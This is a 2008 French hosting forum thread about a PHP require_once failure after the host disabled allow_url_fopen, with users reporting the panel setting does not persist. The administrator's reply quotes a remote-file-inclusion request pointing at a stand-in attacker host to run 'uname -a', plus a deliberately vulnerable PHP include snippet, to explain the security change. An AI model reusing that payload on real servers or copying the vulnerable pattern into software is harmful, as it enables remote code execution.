Forum : Lws & Hebergeur-discount

Hébergement web, nom de domaine et serveur dédié.
https://forum.lws-hosting.com/

Probleme fonction require_once et readfile

https://forum.lws-hosting.com/viewtopic.php?f=12&t=1276

Page 1 sur 1

Probleme fonction require_once et readfile

Publié : mer. mai 21, 2008 6:52 pm
par Dalir
depuis deux jours voilà le message d'erreur que j'obtient sur mon site, lors d'un parsage XML de donnée :
Warning: require_once() [function.require-once]: URL file-access is disabled in the server configuration in D:\www\lsdao.fr\htdocs\includes\fonction.php on line 329

Warning: require_once(http://flux.jeuxonline.info/actualites.php) [function.require-once]: failed to open stream: no suitable wrapper could be found in D:\www\lsdao.fr\htdocs\includes\fonction.php on line 329
voici le code de la fonction :

Code : Tout sélectionner

function rss(){ require_once('http://flux.jeuxonline.info/actualites.php'); foreach ($jol_actualites['items'] as $item) { if ($i <=9){ $i = $i+1; $flux = couper($item['title'],25); echo '<li class="stitre"><a target="_blank" href="' . $item['link'] . '">' . $flux . '</a></li>'; } } }
J'ai rien changer la configuration du serveur, et les urls sont valident.
Le fonction require_once() serait elle désactivés ?

site : http://www.lsdao.fr

Publié : jeu. mai 22, 2008 5:44 pm
par adminforum
Nous avons désactiver en php allow_url_fopen ce quie cause cette erreure pour une raison de sécurité.


Détails:

orsque « allow_url_fopen » à est « On », pour toutes les commandes PHP ouvrant un fichier, si la chaine de caractère contenant le nom de fichier est de type "http://", PHP va récupérer le fichier à l'URL donnée et l'ouvrir.

Cela laisse possible une attaque de type « remote include », environs 70% des failles PHP utilise se principe.

Voici un exemple de ce type d'attaque dans les traces :

GET /claroline170/claroline/phpbb/page_tail.php?includePath= http://www.sitepirate.com/code_hostile. ... uname%20-a HTTP/1.0

Et voici le code vulnérable correspondant:

<?php # def des constantes $file = "toto.php"; #pour avoir un register global if (isset($HTTP_GET_VARS)) { while(list($var,$val)=each($HTTP_GET_VARS)) { $$var=$val;}} #include de la lib toto.php include ($file); ?>

Un appel du type : GET /index.php?file= ‘code_hostile.gif' aura comme conséquence d'exécuter du code PHP arbitraire sur le serveur.


SOLUTIONS :
Nous allons ajouter dans le LWS PANEL la possibilité de modifier cette directive de php mais uniquement pour les serveurs APACHE.

Publié : lun. juin 02, 2008 1:02 pm
par Dalir



SOLUTIONS :
Nous allons ajouter dans le LWS PANEL la possibilité de modifier cette directive de php mais uniquement pour les serveurs APACHE.
ok, cela fait deux jours que tout les matin je passe le paramètre :
« allow_url_fopen » à on via le panneau d'admin. J'attend gentiment 24H et le Phpinfo renvoit toujours "off". Lorsque je retourne dans le panneau d'admin, bah "allow_url_fopen" est off.....

site : www.lsdao.fr

Publié : lun. juin 02, 2008 1:55 pm
par buzzetti



SOLUTIONS :
Nous allons ajouter dans le LWS PANEL la possibilité de modifier cette directive de php mais uniquement pour les serveurs APACHE.
ok, cela fait deux jours que tout les matin je passe le paramètre :
« allow_url_fopen » à on via le panneau d'admin. J'attend gentiment 24H et le Phpinfo renvoit toujours "off". Lorsque je retourne dans le panneau d'admin, bah "allow_url_fopen" est off.....

site : www.lsdao.fr
pareil pour www.casual-suspects.com

Publié : mar. juin 03, 2008 12:52 am
par zab
ok, cela fait deux jours que tout les matin je passe le paramètre :
« allow_url_fopen » à on via le panneau d'admin. J'attend gentiment 24H et le Phpinfo renvoit toujours "off". Lorsque je retourne dans le panneau d'admin, bah "allow_url_fopen" est off.....
pareil pour anna-tools.com, enfin pas tout à fait ca ne fait pas deux jours mais 4 (depuis vendredi)

ticket envoyé, plus que 72 heures à attendre
Fuseau horaire sur UTC+01:00
Page 1 sur 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/